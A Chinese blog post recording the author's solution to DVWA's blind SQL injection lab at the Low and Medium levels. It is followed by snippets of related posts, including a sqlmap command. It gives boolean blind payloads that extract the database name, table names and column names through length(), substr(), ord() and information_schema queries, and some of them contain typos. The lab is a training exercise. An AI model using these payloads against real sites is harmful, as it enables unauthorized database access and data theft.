DVWA[SQL-Injection(Blind)]学习记录

已于 2022-07-07 17:58:57 修改
阅读量373 收藏
点赞数
文章标签: sql 学习 web安全 数据库 安全
于 2022-07-05 17:31:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nareku/article/details/125610235
版权

一天肝一个注入有点上头

示例一(Low)

题目分析

随便注注
输入1
在这里插入图片描述
输入 1’
在这里插入图片描述
再试试 1’’
在这里插入图片描述
注到这差不多知道是字符型注入了,但是因为页面值返回了这个id是否在数据库里面,并没有返回数据库里面的数据,这个时候就不能使用联合查询注入了,所以使用布尔注入来解题

判断库名长度

先来判断一下数据库库名的长度
结合题目场景,输入查询语句:

1' and length(dabase())>3#

回显:
在这里插入图片描述
再试试:

1' and length(database())>4#

回显:

说明数据库的库名长度是4

使用逐字符判断的方法获取数据库库名

数据库库名的范围一般在A-Z, a-z之内,可能还会有其他的一些特殊字符
输入查询语句:(因为在之前的练习中早就知道数据库的库名是‘dvwa’,所以就不一一试试了

1' and substr(database(),1,1)='d(这里的字母不区分大小写)

substr是截取的意思,其意思是截取database()的值,从第一个字符开始(第一个数字1),只返回一个(第二个数字1)
在这里插入图片描述
查询第二个字符的话就是以下查询语句:(后面的依次类推)

1' and  substr(database(),2,1)='v

也可以使用ASCII码的字符来查询,在MySQL中,ASCII码转换的函数是ord()
那么查询语句变为如下:(就不一个个试啦直接上)

1' and ord(substr(database(),1,1))=100#

当然也可以利用Burp来爆破(上面的看起来笨笨的哈哈哈)
在这里插入图片描述

查询表名

查询表名的话,也是先查询表名的长度,已知数据库dvwa里面有两个表,第一个表是guestbook,第二个表是users,所以这里就直接查询啦,拿第二个表来示例啦
输入查询语句:

1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5#

可以得到第二个表名的长度为5
接下来也就是要查询具体的表名,也是简单示例啦
输入查询语句:

1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1)='u'#

依次查询可得:第二个表名为users

爆部分字段

看看users表里面有多少个字段数
查询语句:

1' and (select count(*)  from  information_schema.columns where table_schema='dvwa' and table_name='users')=8#

回显存在,说明users表的字段数为8
惯例先来查询长度(…这个查询语句快把我折磨疯了,我实在不理解这个语句为什么不行 先放一下)
这个是查users表的第一个字段名的长度(注意单引号是中文格式,用 ` 也行)

1and length(substr((select column_name from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’ limit 0,1),1))=7#

(好了我现在知道是什么原因了 我实在不理解为什么这个单引号用中文格式的就行,英文的不行???容我再去找找原因)

mysql中点引号( ’ )和反勾号( ` )的区别:(linux下不区分,windows下区分)
区别:
单引号( ’ )或双引号主要用于字符串的引用符号
eg:mysql> SELECT ‘hello’, “hello” ;

反勾号( ` )主要用于数据库、表、索引、列和别名用的引用符是[Esc下面的键]

eg: mysql > SELECT FROM table WHERE xxx =‘abc’

(上一句红色的字符串两边都加了`,MDark语法搞得它显示不出来…

打上 `是为了防止与系统保留字和普通字符冲突

直接查询user和password是否在users表

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #

 1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #

回显都是exists.

剩下的就不写了,一个一个爆就是一个很大的工作量.

示例二(medium)

和SQL注入中等难度的题目没什么区别
在这里插入图片描述
观察url没看到有参数,那就是POST传参了,浅浅burp抓包

分析:
输入 : 1 回显:exists
输入: 1’ 回显:
输入 : 1’’ 回显:
输入: 1 and 1=1 回显:exists

可以知道是数字型注入,然后单引号和双引号都会被转义,在后面的查询表名以及字段名的时候最好使用ord()函数或者使用十六进制ascii码,后面的基本跟low的雷同(放个图)
在这里插入图片描述

最后一题明天再更啦

narukuuuu
关注
DVWASQL Injection (Blind)
qq_39682037的博客
03-20 2228
盲注 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 Security Level: low 测试流程 输入 1 输入 1 and 1=1 输入1’ 输入 1’ and 1=1 输入 1’ and 1=2 输入1’ and length(database())=1 输入1’ and leng...
DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 796
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA——SQL Injection (Blind)(low)
分享简单的安全技术
01-11 368
SQL Injection (Blind) 界面 源代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
DVWA之暴力破解二(手动注入和使用sqlmap)
cai_huaer的博客
04-19 1721
因为之前我们是登录进来,所以有一个cookie,现在我们之间用url去请求,没有附带cookie,所以这时是需要重新回到登录页面的。再回到之前的源代码那,可以看到,密码是md5加密后再存的,所以在网上搜索md5解密,把爆破出来的密码成功还原。然后我们分析,user变量是用单引号‘去识别的,那我们在输入的时候,自己加入’后再加入一些其他的内容是不是也可以。后台数据库是MySQL,然后有两个数据库,一个是information_schema,一个是dvwa。3.接着,我们继续注入,爆破所有的数据库
dvwaSQL
m0_57379855的博客
10-14 214
SQL InjectionSQL手工注入思路SQL Injectionlow等级medium等级High等级Impossible等级 SQL手工注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 SQL Injection low等级 1.判断是否存在注入,注入是字符型还是数字型 输入1 查询成功,输入永真式,1’ or ‘1’='1 查询成功,输入永假式,1’ a
数据库语句+DVWA联合查询
weixin_44891093的博客
03-03 996
万能密码---->数据库交互:sql注入 将用户输入的内容和源码拼通 功能:能读取并写入数据库所有数据 单引号闭合,or条件不会报错,and错误无法通过 admin’# #号代表注释,用户名正确则通过 sql注入分类 1.Get注入:更快 只有1个数据包,提交后不安全可直接看到路径。 2.Post注入 :更安全 数据包数量更多,分批发送,可看数据包路径。 sql注入可能存在的包头 Referer头:数据包来源头 http头:用户通过什么访问 更改方式: 1.手动将Get改为Post 2.右键—&g
DVWA--SQL
weixin_51075988的博客
01-28 361
DVWASQL 文章目录DVWA--SQLSQL InjectionLowMediumHighImpossibleSQL Injection (Blind)LowMediumHighImpossible SQL Injection Low 查看源码 进行简单的查询然后通过while循环出所有结果 sql语句为 SELECT first_name, last_name FROM users WHERE user_id = '$id';'' or '1'='1' 进行注入 ' or 1# ' or '1'=
DVWA--SQL Injection(Blind)(SQL盲注)(全难度)
wwxxee
03-03 291
DVWASQL Injection (Blind)(SQL盲注) 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入框输入ID,然后判断该ID是否存在 难度分级 Low 核心代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM u
DVWA——SQL Injection(Blind)【详细的步骤实现(图解)包含多种盲注方法并且附上了payload】
weixin_46709219的博客
01-04 791
一)区别: SQL盲注与一般注入的区别在于一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 二)思想: 在盲注,页面无论对错都只会以 “是” 或者 “不是”来对我们的SQL语句进行结果的反馈,因此我们需要构造payload去询问例如“数据库名字的第一个字母是不是a?”,通过问答的方式最终获取我们想要的数据。 三)盲注分为基于布尔盲注、基于
DVWA--SQLInjection(blind)
weixin_45038413的博客
05-09 490
Low等级 确定注入poc 1.手工注入(布尔型) 确定字符串长度 确定字符串内容 (二分法,步骤省略) 得到: substr(database(),1,1)=’d’ substr(database(),2,1)=’v’ substr(database(),3,1)=’w’ substr(database(),4,1)=’a’ database() =’dvwa’ 2.手工注入(延...
DVWA SQL
m0_73606240的博客
01-29 124
DVWA SQL1
sqlmap dvwa注入测试
weixin_45774059的博客
06-05 316
带上cookie爆出数据库 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# " --cookie="security=low; PHPSESSID=6tuf1mkr1snkgcgdi0e4gaiam9 " --dbs 列出当前数据库的详细信息 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities...
dvwa sql显注记录
zhuziwan的博客
01-12 316
dvwa sql显注记录
SQL学习之路--DVWA等级LOW
m0_69555575的博客
06-17 546
一名想进入安全行业的普通青年
SQL 布尔盲注
qq_42378173的博客
10-11 1398
SQL 布尔盲注
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5805
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWASQL Injection Blind(SQL盲注)
RexHa的博客
10-04 2485
DVWA sql盲注
DVWASQL Injection-----------------------low
qq_43665434的博客
02-25 354
DVWASQL Injection-----------------------low 1、初步测试 输入单引号报错 输入' and 1=1#回显正常,说明存在sql注入 输入' or 1=1#,遍历出数据库内容: 用order by测出主查询为两个字段 2、获取数据库名、用户名、版本 用union语句查询数据库名和用户名: payload_1:' union select database(),user()# payload_2:' union select 1,concat_ws('~',dat
如何准备 PostgreSQL 级认证考试?
最新发布
cqsizhuang的博客
11-14 303
准备PostgreSQL级认证考试(PGCE)需要系统的学习和实践。
dvwa sql injection (blind)
03-16
DVWA SQL注入(盲注)是一种攻击技术,利用应用程序的漏洞,通过注入恶意代码来获取敏感数据或者控制应用程序。在盲注,攻击者无法直接获取数据库的数据,而是通过不断尝试不同的注入语句,观察应用程序的反应来推断出数据库的数据。这种攻击技术需要一定的技术水平和耐心,但是一旦攻击成功,将会对应用程序和用户造成严重的损失。因此,开发人员和管理员需要采取措施来保护应用程序,避免SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值